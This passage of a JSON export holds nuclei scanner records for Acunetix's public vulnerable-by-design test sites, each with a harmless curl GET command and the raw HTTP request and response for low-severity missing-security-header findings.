cellPadding="10" width="790" align="center" border="0">\r\n\t\t\t\t<TR>\r\n\t\t\t\t\t<TD id="tdPageData" valign="top">\r\n\t\t\t\t\t<DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">(37) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">(37) comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">(41) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>\r\n\r\n\t\t\t\t\t<TD vAlign="top" width="200">\r\n\t\t\t\t\t\t<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">\r\n\t<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">\r\n\t\t<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V9040')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">November 2024</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V9101')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>\r\n\t</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9066')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9067')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9068')" style="color:Black" title="October 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9069')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9070')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9071')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9072')" style="color:Black" title="November 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9073')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9074')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9075')" style="color:Black" title="November 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9076')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9077')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9078')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9079')" style="color:Black" title="November 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9080')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9081')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9082')" style="color:Black" title="November 12">12</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9083')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9084')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9085')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9086')" style="color:Black" title="November 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9087')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9088')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9089')" style="color:Black" title="November 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9090')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9091')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9092')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9093')" style="color:Black" title="November 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9094')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9095')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9096')" style="color:Black" title="November 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9097')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9098')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9099')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9100')" style="color:Black" title="November 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9101')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9102')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9103')" style="color:Black" title="December 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9104')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9105')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9106')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9107')" style="color:Black" title="December 07">7</a></td></tr>\r\n</table><BR>\r\n<a href="rssFeed.aspx">Get RSS feed</a>\r\n</TD>\r\n\t\t\t\t</TR>\r\n\t\t\t\t<TR>\r\n\t\t\t\t\t<TD colSpan="2">\r\n\t\t\t\t\t</TD>\r\n\t\t\t\t</TR>\r\n\t\t\t</TABLE>\r\n\t\t</form>\r\n\t</body>\r\n\t<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">\r\n\t\t<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>\r\n\t</div>\r\n</HTML>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 448, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1' 'http://testasp.vulnweb.com/T'", + "type": "http", + "http_url": "http://testasp.vulnweb.com/T", + "discovered_date": "2024-11-13T02:41:07.618Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /T HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nContent-Length: 1233\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:46 GMT\r\nServer: Microsoft-IIS/8.5\r\nX-Powered-By: ASP.NET\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>\r\n<title>403 - Forbidden: Access is denied.</title>\r\n<style type="text/css">\r\n<!--\r\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\r\nfieldset{padding:0 15px 10px 15px;} \r\nh1{font-size:2.4em;margin:0;color:#FFF;}\r\nh2{font-size:1.7em;margin:0;color:#CC0000;} \r\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \r\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;\r\nbackground-color:#555555;}\r\n#content{margin:0 0 0 2%;position:relative;}\r\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\r\n-->\r\n</style>\r\n</head>\r\n<body>\r\n<div id="header"><h1>Server Error</h1></div>\r\n<div id="content">\r\n <div class="content-container"><fieldset>\r\n <h2>403 - Forbidden: Access is denied.</h2>\r\n <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>\r\n </fieldset></div>\r\n</div>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 449, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50' 'http://testhtml5.vulnweb.com/.carousel'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/.carousel", + "discovered_date": "2024-11-13T02:41:07.760Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /.carousel HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 NOT FOUND\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>404 Not Found</title>\n<h1>Not Found</h1>\n<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 450, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203' 'http://testphp.vulnweb.com/CVS/Repository'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Repository", + "discovered_date": "2024-11-13T02:41:07.899Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Repository HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 8\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:56 GMT\r\nEtag: "4dca64a4-8"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\nacupart\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 451, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/admin'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/admin", + "discovered_date": "2024-11-13T02:41:08.042Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /admin HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 308 PERMANENT REDIRECT\r\nConnection: close\r\nContent-Length: 253\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nLocation: http://localhost/admin/\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>Redirecting...</title>\n<h1>Redirecting...</h1>\n<p>You should be redirected automatically to target URL: <a href="http://localhost/admin/">http://localhost/admin/</a>. If not click the link.", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 452, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48' 'http://testhtml5.vulnweb.com/ajax/archive'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/ajax/archive", + "discovered_date": "2024-11-13T02:41:08.189Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /ajax/archive HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 2\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n[]", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 453, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202", + "discovered_date": "2024-11-13T02:41:08.332Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/app/libs/sessvars.js:202 HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 454, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/login'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/login", + "discovered_date": "2024-11-13T02:41:08.482Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /login HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 405 METHOD NOT ALLOWED\r\nConnection: close\r\nContent-Length: 178\r\nAllow: POST, OPTIONS\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>405 Method Not Allowed</title>\n<h1>Method Not Allowed</h1>\n<p>The method is not allowed for the requested URL.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 455, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36' 'http://testhtml5.vulnweb.com/comment'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/comment", + "discovered_date": "2024-11-13T02:41:08.642Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /comment HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Sorry, but commenting is currently disabled! <!-- invalid -->\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 456, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": 